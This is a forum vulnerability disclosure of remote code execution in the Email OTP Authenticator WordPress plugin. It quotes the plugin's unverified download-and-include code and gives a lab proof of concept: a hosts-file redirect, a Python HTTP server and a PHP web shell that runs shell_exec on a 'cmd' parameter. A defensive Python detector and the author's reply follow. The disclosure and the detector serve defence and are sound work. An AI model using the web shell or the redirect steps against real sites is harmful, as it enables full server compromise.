• Resolved joostgrunwald

    (@joostgrunwald)


    Email OTP Authenticator – Remote Code Execution via insecure remote code download and runtime inclusion

    • Affected plugin: Email OTP Authenticator
    • Affected versions: all so far
    • Component: email-otp-authenticator.php (“Addon+Prime service” / Extreme demo path)
    • CWE: CWE-494 Download of Code Without Integrity Check; CWE-295 Improper Certificate Validation; CWE-829 Inclusion of Functionality from Untrusted Control Sphere
    • CVSS v3.1: 8.8 High (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)

    Summary
    The plugin downloads a PHP file from a remote server with SSL verification disabled and then includes it at runtime. Any network attacker (MITM/DNS hijack) or compromise of the remote host can deliver arbitrary PHP that executes with the WordPress PHP process’ privileges.

    Technical details

    • In the “Addon+Prime service” flow, when the option emailotpauthn_extremedemo is enabled, the plugin fetches and writes a remote PHP payload and then includes it:
    • Disables TLS certificate validation and downloads remote code:
    • CURLOPT_SSL_VERIFYPEER set to 0
    • Writes remote content into the plugin folder
    • Includes the resulting PHP file via include(…), executing it in-process

    Even more detailed:

    curl_setopt($chfc, CURLOPT_SSL_VERIFYPEER, 0);
    $Classfilecontent = curl_exec($chfc);

    $Classfilecontent = file_put_contents($classfilepath, $Classfilecontent, LOCK_EX);

    $classfile = emailotpauthn_extremedemo_setup($classfile);

    include(sprintf("%s/lib/%s", dirname(__FILE__), $classfile));

    Impact

    • Remote Code Execution (RCE) in the context of the web server process. Full compromise of the WordPress site and potentially the underlying server account.

    Prerequisites

    • Admin toggles the “Activate Addon+Prime Service” option (in the plugin’s settings UI), or the option is otherwise set to 1. But it is expected most users will have this enabled.
    • Attacker can influence the network path (MITM/DNS) or the remote update endpoint is compromised.

    Proof of concept:

    1) Point the plugin’s remote host to your test server

    • Edit /etc/hosts on the WP server:
    • Add: 127.0.0.1 eotpa.cs7.in
    • Start a simple HTTP server on port 80 serving a malicious PHP file at /api_server/emailotpauthn-class-extreme_demo.txt:
    • Directory structure:
    • ./api_server/emailotpauthn-class-extreme_demo.txt
    • Minimal payload (must be > 11000 bytes; pad with comments). Example file head:

    <?php
    /*
    pad pad pad … (repeat to exceed 11000 bytes)
    */
    add_action('init', function () {
      if (isset($_GET['cmd'])) {
        echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';
        exit;
      }
    });
    • Serve it:
    • python3 -m http.server 80

    2) Enable the vulnerable flow

    • In WP admin, visit: Settings → Email OTP Router → check “Activate Addon+Prime Service” → Save.
    • This sets emailotpauthn_extremedemo = 1, causing the plugin to fetch the remote file on next load.

    3) Trigger the download and inclusion

    • Reload any admin page (or the site). The plugin will:
    • Download emailotpauthn-class-extreme_demo.txt from eotpa.cs7.in (now your server)
    • Write it under lib/emailotpauthn-class-extreme_demo.php
    • Include it at runtime

    4) Verify RCE (lab only)

    • Visit http://your-site/?cmd=id (or any route that executes WordPress) and observe output of the injected handler.

    Remediation

    • Remove remote code download/execution entirely. Do not fetch or write executable PHP from external hosts.
    • If remote updates are required, use WordPress’ signed update mechanisms only.
    • Never disable TLS verification; validate server certificates and pin versions/hashes if applicable.
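A defender-side static check for the download-then-include pattern described in the report above (TLS verification disabled, response written to disk, written path passed to include). This is an added example, not part of the original post or the plugin's code; the two PHP samples are constructed from the quoted snippet, and the regexes are a line-based heuristic rather than a PHP parser.

```python
import re

# Heuristic regexes (assumption: roughly one statement per line, no PHP parser).
RE_TLS_OFF = re.compile(
    r"curl_setopt\s*\(\s*\$\w+\s*,\s*CURLOPT_SSL_VERIFY(?:PEER|HOST)\s*,\s*(?:0|false)\s*\)", re.I)
RE_WRITE = re.compile(r"\bfile_put_contents\s*\(", re.I)
# include/require whose path is built from a variable rather than a literal
RE_DYN_INCLUDE = re.compile(r"\b(?:include|require)(?:_once)?\b[^;]*\$\w+", re.I)


def find_download_include(php_source):
    """Return line numbers per sub-pattern and whether all three co-occur (CWE-295/494/829)."""
    tls_off, writes, dyn_includes = [], [], []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        if RE_TLS_OFF.search(line):
            tls_off.append(lineno)
        if RE_WRITE.search(line):
            writes.append(lineno)
        if RE_DYN_INCLUDE.search(line):
            dyn_includes.append(lineno)
    return {
        "tls_verify_disabled": tls_off,
        "file_write": writes,
        "dynamic_include": dyn_includes,
        "matches_pattern": bool(tls_off and writes and dyn_includes),
    }

# Constructed sample: the statements quoted in the report, plus two
# preceding curl lines added here so the snippet reads as one flow.
VULNERABLE_PHP = r"""<?php
$chfc = curl_init($remote_url);
curl_setopt($chfc, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($chfc, CURLOPT_SSL_VERIFYPEER, 0);
$Classfilecontent = curl_exec($chfc);
$Classfilecontent = file_put_contents($classfilepath, $Classfilecontent, LOCK_EX);
$classfile = emailotpauthn_extremedemo_setup($classfile);
include(sprintf("%s/lib/%s", dirname(__FILE__), $classfile));
"""

# Constructed contrast: remote data over verified TLS, parsed, never executed.
SAFE_PHP = r"""<?php
$resp = wp_remote_get($url, array('sslverify' => true));
$settings = json_decode(wp_remote_retrieve_body($resp), true);
require_once __DIR__ . '/lib/static-helper.php';
"""

if __name__ == "__main__":
    for name, src in (("vulnerable", VULNERABLE_PHP), ("safe", SAFE_PHP)):
        print(name, find_download_include(src))
```

Run it over a plugin directory's .php files to triage candidates; a true match is one where the same handle is written to disk and then included, so confirm by reading the code around the flagged lines.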
Viewing 1 replies (of 1 total)
  • Plugin Author Chandan Shrivastava

    (@ilvchandan)

    All processes remain fully secure, but the new version 6.3.2 onward includes improvements based on your suggestions.

    Regards,
    The developer.


The topic ‘Remote Code Execution via insecure remote code download and runtime inclusion’ is closed to new replies.